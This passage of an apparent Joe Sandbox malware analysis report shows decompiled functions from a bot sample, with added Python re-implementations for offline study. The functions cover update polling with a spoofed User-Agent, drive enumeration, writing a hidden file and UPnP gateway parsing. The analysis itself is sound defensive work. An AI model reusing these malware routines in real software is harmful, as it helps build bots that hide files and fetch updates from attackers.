                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}





                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction ID: 5740a4334c3a4aa6fa35b80b2035fb24052f91dcc8a06d59cd48ed0533e674c8
                                                                                  • Opcode Fuzzy Hash: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction Fuzzy Hash: 5731EA74A0020ADFCB14CF99D885BEFB7B5BF88304F108669E515B7390D778A985CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
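The two node-walking functions above (the device/deviceType routine and E0040CAF1 for service/serviceType) share one shape: iterate a node list, keep the node whose base name equals a fixed element name and whose child element of a second fixed name has text equal, case-insensitively via lstrcmpiW, to the caller's argument, releasing every other node. The following is an added example written by the editor, not code from the sample or from the Joe Sandbox report, that re-expresses that loop over a plain XML tree so it can be run offline. Two things in it are assumptions rather than facts stated on the page: the vtable offsets +0x1c, +0xa4, +0x68 and +8 are read as IXMLDOMNodeList::get_item, IXMLDOMNode::get_baseName, IXMLDOMNode::get_text and IUnknown::Release of MSXML, and the element names device/deviceType and service/serviceType are taken to be those of a UPnP device description, which is why the constructed input below is shaped like an Internet Gateway Device description. E0040C5B0(node, L"serviceType") is read as "find the child element with that name".

```python
"""Editor's example: the node-matching loop of the decompiled functions,
re-implemented over ElementTree. The XML is constructed for this example."""
import xml.etree.ElementTree as ET

# Constructed sample shaped like a UPnP root-device description (assumption:
# that is what the sample parses; the page only shows the element names).
SAMPLE_XML = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <device>
    <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
    <serviceList>
      <service>
        <serviceType>urn:schemas-upnp-org:service:Layer3Forwarding:1</serviceType>
        <controlURL>/ctl/L3F</controlURL>
      </service>
    </serviceList>
    <deviceList>
      <device>
        <deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
        <serviceList>
          <service>
            <serviceType>URN:SCHEMAS-UPNP-ORG:SERVICE:WANIPConnection:1</serviceType>
            <controlURL>/ctl/IPConn</controlURL>
          </service>
        </serviceList>
      </device>
    </deviceList>
  </device>
</root>
"""


def load_sample():
    return ET.fromstring(SAMPLE_XML)


def base_name(elem):
    """IXMLDOMNode::get_baseName equivalent: the local name without namespace."""
    return elem.tag.rsplit("}", 1)[-1]


def lstrcmpi_equal(a, b):
    """lstrcmpiW(a, b) == 0, i.e. case-insensitive equality. casefold() stands in
    for the locale-aware Win32 compare; identical for the ASCII URNs used here."""
    return a.casefold() == b.casefold()


def find_child_by_type(node_list, elem_name, type_name, wanted):
    """The loop body of E0040CAF1 / the device variant: first node in node_list
    whose base name is elem_name and whose type_name child's text equals wanted
    (case-insensitively), or None. Nodes that do not match are dropped, which is
    what the Release() calls in the decompilation do."""
    for node in node_list:
        if not lstrcmpi_equal(base_name(node), elem_name):
            continue
        for child in node:  # stands in for E0040C5B0(node, type_name)
            if lstrcmpi_equal(base_name(child), type_name):
                text = (child.text or "").strip()
                if lstrcmpi_equal(text, wanted):
                    return node
                break
    return None


def find_service(doc, service_type):
    """E0040CAF1 over every node of the document (the page does not show how
    the node list passed in was built; iterating all nodes is an assumption)."""
    return find_child_by_type(doc.iter(), "service", "serviceType", service_type)


def find_device(doc, device_type):
    """The device/deviceType variant."""
    return find_child_by_type(doc.iter(), "device", "deviceType", device_type)


def control_url(doc, service_type):
    """What a UPnP client typically does with the located <service>: read its
    controlURL. This step is not shown on the page and is an assumption."""
    svc = find_service(doc, service_type)
    if svc is None:
        return None
    for child in svc:
        if base_name(child) == "controlURL":
            return child.text
    return None


if __name__ == "__main__":
    doc = load_sample()
    # Note the request is lower-case while the document's value is upper-case:
    # lstrcmpiW semantics still match it.
    print(control_url(doc, "urn:schemas-upnp-org:service:WANIPConnection:1"))
```

The case-insensitive compare matters in practice: real gateways emit the service URN in varying case, and a client that compared with lstrcmpW would silently miss the WANIPConnection service on some of them. Note also that the decompiled loop stops at the first match and releases everything else, so ownership of exactly one node leaves the function; a reimplementation that keeps references to several nodes would leak COM objects.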

                                                                                  C-Code - Quality: 100%
                                                                                  			E004048C0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v16;
                                                                                  				long _v20;
                                                                                  				signed int _v24;
                                                                                  				void* _v28;
                                                                                  				char _v32;
                                                                                  				int _v36;
                                                                                  				void* _t44;
                                                                                  
                                                                                  				_v20 = GetLogicalDrives();
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0x80000002; // HKEY_LOCAL_MACHINE
                                                                                  				_v8 = 0x80000001; // HKEY_CURRENT_USER
                                                                                  				_v24 = 0;
                                                                                  				while(_v24 < 2) {
                                                                                  					if(RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28) == 0) { // *(_t44 + _v24*4 - 8) indexes _v12 then _v8 (HKLM, then HKCU); 0x20019 == KEY_READ
                                                                                  						_v32 = 0;
                                                                                  						_v36 = 4;
                                                                                  						if(RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36) == 0 && _v32 != 0) { // NoDrives: REG_DWORD bitmask, bit n hides drive letter 'A'+n in Explorer
                                                                                  							_v16 = _v16 | _v32;
                                                                                  						}
                                                                                  						RegCloseKey(_v28);
                                                                                  					}
                                                                                  					_v24 = _v24 + 1;
                                                                                  				}
                                                                                  				return  !_v16 & _v20; // decompiler prints bitwise NOT as '!': present drives with the policy-hidden ones masked out
                                                                                  			}













                                                                                  APIs
                                                                                  • GetLogicalDrives.KERNEL32 ref: 004048C6
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                  • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  Strings
                                                                                  • NoDrives, xrefs: 00404938
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404907
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                  • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                  • API String ID: 2666887985-3471754645
                                                                                  • Opcode ID: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction ID: 2b22d0c5c2d49d9c8cdb046828b539e9dc82b3d10e46f6989da5e31515f8ca9d
                                                                                  • Opcode Fuzzy Hash: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction Fuzzy Hash: 8411FCB5E4020A9BDF10DFD0D945BEFBBB4BB48704F108129E611B7280D7B85A45CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
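                                                                                  The function above reads the NoDrives policy value from HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer with a KEY_READ access mask (0x00020019), and its API ID shows it is paired with GetLogicalDrives. NoDrives is a DWORD bitmask in which bit 0 hides A:, bit 1 hides B:, and so on up to bit 25 for Z:. The decoder below is an added example written for this report, not code from the sample or from Joe Sandbox; it turns such a value into drive letters, builds the inverse mask, and filters a candidate drive list the way an analyst would when working out which volumes a policy hides from the sample's enumeration. The function names and the sample masks are constructed for the example; the live read uses the standard winreg module and simply returns None on a non-Windows analysis box.

```python
import string
from typing import Iterable, List, Optional

try:
    import winreg                      # only present on Windows
except ImportError:                    # non-Windows analysis box: decode only
    winreg = None

# Key and value queried by the sample (HKLM, access mask 0x00020019 == KEY_READ).
POLICY_KEY = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
VALUE_NAME = "NoDrives"
ALL_DRIVES = 0x03FFFFFF                # bits 0..25 -> A: .. Z:


def hidden_drives(mask: int) -> List[str]:
    """Decode a NoDrives bitmask: bit n set means drive chr(ord('A') + n) is hidden."""
    if not 0 <= mask <= ALL_DRIVES:
        raise ValueError(f"NoDrives value out of range: {mask:#x}")
    return [letter for n, letter in enumerate(string.ascii_uppercase) if mask >> n & 1]


def mask_for(letters: Iterable[str]) -> int:
    """Inverse of hidden_drives(): build the bitmask that hides the given letters."""
    mask = 0
    for letter in letters:
        letter = letter.upper().rstrip(":")
        if len(letter) != 1 or letter not in string.ascii_uppercase:
            raise ValueError(f"not a drive letter: {letter!r}")
        mask |= 1 << (ord(letter) - ord("A"))
    return mask


def visible_drives(candidates: Iterable[str], mask: int) -> List[str]:
    """Filter a candidate drive list (e.g. root paths from GetLogicalDrives) against the policy."""
    hidden = set(hidden_drives(mask))
    return [d for d in candidates if d[0].upper() not in hidden]


def read_nodrives() -> Optional[int]:
    """Read the live value the sample queries; None when absent or not on Windows."""
    if winreg is None:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY, 0, winreg.KEY_READ) as key:
            value, value_type = winreg.QueryValueEx(key, VALUE_NAME)
    except OSError:
        return None
    return value if value_type == winreg.REG_DWORD else None


if __name__ == "__main__":
    mask = read_nodrives()
    if mask is None:
        mask = mask_for(["C", "E"])    # constructed value for an offline run
    print(f"NoDrives={mask:#010x} hides {hidden_drives(mask)}")
```

                                                                                  A policy value only affects what Explorer displays; the bitmask says nothing about whether a volume exists, so the filter is applied to the GetLogicalDrives result rather than replacing it.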

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D7F0(char* _a4, intOrPtr* _a8) {
                                                                                  				/* _a4: URL to poll; _a8: pointer to the last Content-Length seen.
                                                                                  				   Returns 1 when the remote object looks new (size > 5000 bytes and changed). */
                                                                                  				void* _v8;
                                                                                  				char _v9;
                                                                                  				void* _v16;
                                                                                  				void _v20;   /* receives the Content-Length; never initialised before the query */
                                                                                  				long _v24;
                                                                                  
                                                                                  				_v9 = 0;
                                                                                  				/* INTERNET_OPEN_TYPE_DIRECT (1) with a hard-coded Chrome 93 User-Agent */
                                                                                  				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 1, 0, 0, 0);
                                                                                  				if(_v16 != 0) {
                                                                                  					_v8 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0);
                                                                                  					if(_v8 != 0) {
                                                                                  						_v24 = 4;
                                                                                  						/* 0x20000005 = HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_CONTENT_LENGTH: Content-Length as a DWORD.
                                                                                  						   The return value is not checked, so when the header is absent _v20 keeps stale stack data. */
                                                                                  						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                  						/* 0x1388 = 5000 bytes; only a larger, different size counts as a change */
                                                                                  						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                  							 *_a8 = _v20;
                                                                                  							_v9 = 1;
                                                                                  						}
                                                                                  						InternetCloseHandle(_v8);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v16);
                                                                                  				}
                                                                                  				return _v9;
                                                                                  			}
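                                                                                  The polling logic in E0040D7F0 is a size-based change detector: the bot remembers the last Content-Length it saw and treats the remote object as new only when the value exceeds 0x1388 (5000) bytes and differs from the stored one. The following Python is an added example written for this report, not code from the sample or from Joe Sandbox; it re-implements that decision over constructed HTTP response heads so the behaviour can be checked offline. The header parser, the `poll_sequence` helper and the three sample heads are assumptions of the example, not captured traffic.

```python
import re
from typing import List, Optional, Tuple

# Threshold from the decompiled check: _v20 > 0x1388 (5000 bytes).
MIN_SIZE = 0x1388

# Constructed response heads (not captured traffic). Only the status line and
# headers matter: the sample asks WinINet for HTTP_QUERY_CONTENT_LENGTH as a number.
HEAD_OK = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 74113\r\n"
    b"\r\n"
)
HEAD_SMALL = b"HTTP/1.1 200 OK\r\nContent-Length: 512\r\n\r\n"            # e.g. a short error page
HEAD_CHUNKED = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"   # no Content-Length at all


def content_length(head: bytes) -> Optional[int]:
    """Return the Content-Length of a raw HTTP response head, or None if absent or invalid."""
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        if not line:
            break                                 # blank line ends the headers
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            value = value.strip()
            return int(value) if re.fullmatch(rb"\d+", value) else None
    return None


def update_available(head: bytes, last_size: int) -> Tuple[bool, int]:
    """Replicate E0040D7F0's decision.

    Returns (changed, size_to_remember). The sample updates its stored size,
    and returns 1, only when the new value is > 5000 and differs from it.
    """
    size = content_length(head)
    if size is None:
        # The original never checks HttpQueryInfoA's result, so an absent header
        # leaves its local uninitialised. Here the poll is treated as "no change".
        return False, last_size
    if size > MIN_SIZE and size != last_size:
        return True, size
    return False, last_size


def poll_sequence(heads: List[bytes], initial: int = 0) -> List[bool]:
    """Run a series of polls through the check, carrying the remembered size forward."""
    results = []
    size = initial
    for head in heads:
        changed, size = update_available(head, size)
        results.append(changed)
    return results


if __name__ == "__main__":
    print(poll_sequence([HEAD_OK, HEAD_OK, HEAD_SMALL, HEAD_CHUNKED,
                         HEAD_OK.replace(b"74113", b"80001")]))
```

                                                                                  Two properties follow directly from the check and are worth keeping in mind when sinkholing or emulating the URL: any response larger than 5000 bytes whose length differs from the previous one satisfies the "changed" condition, whatever its content, and a response without a Content-Length header leaves the decision to whatever happens to be on the stack in the original.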

                                                                                  APIs
                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D807
                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D826
                                                                                  • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D84F
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D878
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D882
                                                                                  Strings
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 3871184103-2352012373
                                                                                  • Opcode ID: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction ID: 266a7dd59df556f887e0a4dfc4e5eaf5996777bbeb911e957400ba413950654c
                                                                                  • Opcode Fuzzy Hash: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction Fuzzy Hash: 1A110A75E40208ABDB10DFD4CC49FDEB7B5AB08700F1085A5F9116B2D0C7B5AA44CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 97%
                                                                                  			E00404580(intOrPtr _a12, intOrPtr _a16) {
                                                                                  				signed int _v5;
                                                                                  				void* _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				signed int _v32;
                                                                                  				long _v36;
                                                                                  				signed char _t76;
                                                                                  				void* _t79;
                                                                                  				intOrPtr _t87;
                                                                                  				intOrPtr _t88;
                                                                                  				signed char _t91;
                                                                                  				signed int _t141;
                                                                                  				void* _t158;
                                                                                  				void* _t159;
                                                                                  				void* _t160;
                                                                                  				void* _t169;
                                                                                  
                                                                                  				_v5 = 0;
                                                                                  				/* global lock at 0x4143f0 serialising access to the entry table used below */
                                                                                  				EnterCriticalSection(0x4143f0);
                                                                                  				_t111 = _a12;
                                                                                  				_t76 = E0040B550(_a12, _a16);
                                                                                  				_t159 = _t158 + 8;
                                                                                  				if((_t76 & 0x000000ff) != 0) {
                                                                                  					_t79 = E0040B4F0(_t111, _a12);
                                                                                  					_t160 = _t159 + 4;
                                                                                  					_v12 = _t79;
                                                                                  					if(_v12 != 0) {
                                                                                  						_v5 = 1;
                                                                                  						_v13 = 0;
                                                                                  						_v20 = 0;
                                                                                  						while(1) {
                                                                                  							_t169 = _v20 -  *0x41440c; // 0x0
                                                                                  							if(_t169 >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							/* table base at *0x414408, *0x41440c entries of 0x110 bytes; an entry is matched on the DWORD at +4 */
                                                                                  							_v24 = _v20 * 0x110 +  *0x414408;
                                                                                  							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                  								memcpy(_v24, _v12, 0x40 << 2);
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x108)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x108)) = E00409020(_a12, _a16);
                                                                                  								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x100)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                  								 *((intOrPtr*)(_v24 + 0x100)) = E0040AE60( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                  								E004058A0( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_t160 = _t160 + 0x3c;
                                                                                  								_v13 = 1;
                                                                                  							} else {
                                                                                  								_v20 = _v20 + 1;
                                                                                  								continue;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						__eflags = _v13 & 0x000000ff;
                                                                                  						if((_v13 & 0x000000ff) == 0) {
                                                                                  							_t91 = E004040F0(_a16, _v12, _a12, _a16, 1);
                                                                                  							_t160 = _t160 + 0x10;
                                                                                  							__eflags = _t91 & 0x000000ff;
                                                                                  							if((_t91 & 0x000000ff) == 0) {
                                                                                  								 *0x41440c = 0;
                                                                                  								_v5 = 0;
                                                                                  							}
                                                                                  						}
                                                                                  						E00408FB0(_v12);
                                                                                  						__eflags = _v5 & 0x000000ff;
                                                                                  						if((_v5 & 0x000000ff) != 0) {
                                                                                  							/* path at 0x414620; GENERIC_WRITE (0x40000000), no sharing, CREATE_ALWAYS (2),
                                                                                  							   FILE_ATTRIBUTE_HIDDEN (2): the file is rewritten from scratch and marked hidden */
                                                                                  							_v28 = CreateFileW(0x414620, 0x40000000, 0, 0, 2, 2, 0);
                                                                                  							__eflags = _v28 - 0xffffffff;
                                                                                  							if(_v28 != 0xffffffff) {
                                                                                  								_v32 = 0;
                                                                                  								while(1) {
                                                                                  									__eflags = _v32 -  *0x41440c; // 0x0
                                                                                  									if(__eflags >= 0) {
                                                                                  										break;
                                                                                  									}
                                                                                  									_t87 =  *0x414408; // 0x0
                                                                                  									_t88 =  *0x414408; // 0x0
                                                                                  									/* each entry's buffer (+0x108) and length (+0x10c) are appended in turn */
                                                                                  									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                  									_t141 = _v32 + 1;
                                                                                  									__eflags = _t141;
                                                                                  									_v32 = _t141;
                                                                                  								}
                                                                                  								FlushFileBuffers(_v28);
                                                                                  								CloseHandle(_v28);
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection(0x4143f0);
                                                                                  				return _v5;
                                                                                  			}

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 00404591
                                                                                  • CreateFileW.KERNEL32(00414620,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,?,00000000,0040A827,006A0266), ref: 00404740
                                                                                  • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000,?,?,?,?,00000000), ref: 004047A2
                                                                                  • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047AE
                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047B8
                                                                                  • LeaveCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 004047C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                  • String ID:
                                                                                  • API String ID: 2945370292-0
                                                                                  • Opcode ID: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction ID: 01e06390de1b97125c550d85264ffb387e1c01f9fade460cde3dda761564bb80
                                                                                  • Opcode Fuzzy Hash: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction Fuzzy Hash: 4A71A3B5A00209ABCB04CF94D985FEFB7B5BB88304F148169E505B7382D779A941CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040BF50(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                  				long _v8;
                                                                                  				signed int* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _t49;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				if(_a4 == 0) {
                                                                                  					L8:
                                                                                  					return _v8;
                                                                                  				}
                                                                                  				_v12 = _a4;
                                                                                  				EnterCriticalSection( &(_v12[1]));
                                                                                  				E0040BED0( &(_v12[1]), _v12);
                                                                                  				if(_a12 != 0) {
                                                                                  					_v12[7] = E00408EA0(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                  					if(_v12[7] != 0) {
                                                                                  						_v16 = CreateThread(0, _a8, _a12, _a16, 0, _a20);
                                                                                  						if(_v16 != 0) {
                                                                                  							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                  							 *_v12 =  *_v12 + 1;
                                                                                  							if(_a24 != 0) {
                                                                                  								_t49 = GetCurrentProcess();
                                                                                  								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                  							}
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection( &(_v12[1]));
                                                                                  				goto L8;
                                                                                  			}
                                                                                  0x0040bf56
                                                                                  0x0040bf61
                                                                                  0x0040c038
                                                                                  0x0040c03e
                                                                                  0x0040c03e
                                                                                  0x0040bf6a
                                                                                  0x0040bf74
                                                                                  0x0040bf7e
                                                                                  0x0040bf8a
                                                                                  0x0040bfaf
                                                                                  0x0040bfb9
                                                                                  0x0040bfd5
                                                                                  0x0040bfdc
                                                                                  0x0040bfec
                                                                                  0x0040bffa
                                                                                  0x0040c000
                                                                                  0x0040c00c
                                                                                  0x0040c01e
                                                                                  0x0040c01e
                                                                                  0x0040c024
                                                                                  0x0040c024
                                                                                  0x0040bfdc
                                                                                  0x0040bfb9
                                                                                  0x0040c032
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BED0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BF10
                                                                                    • Part of subcall function 0040BED0: CloseHandle.KERNEL32(?), ref: 0040BF29
                                                                                  • CreateThread.KERNEL32 ref: 0040BFCF
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                  • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2251373460-0
                                                                                  • Opcode ID: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction ID: 5aaab35954c252b20d942d79868cba7d8a41f7cfd36b01251640d95963f0b6d7
                                                                                  • Opcode Fuzzy Hash: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction Fuzzy Hash: 23311E74A00208EFDB04DF94D889F9EBBB5FF48314F1081A9E905A7391D779AA81CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00407CC0(signed int _a4, signed int _a8) {
                                                                                  
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 | _a4;
                                                                                  				_a8 = _a8 | _a8;
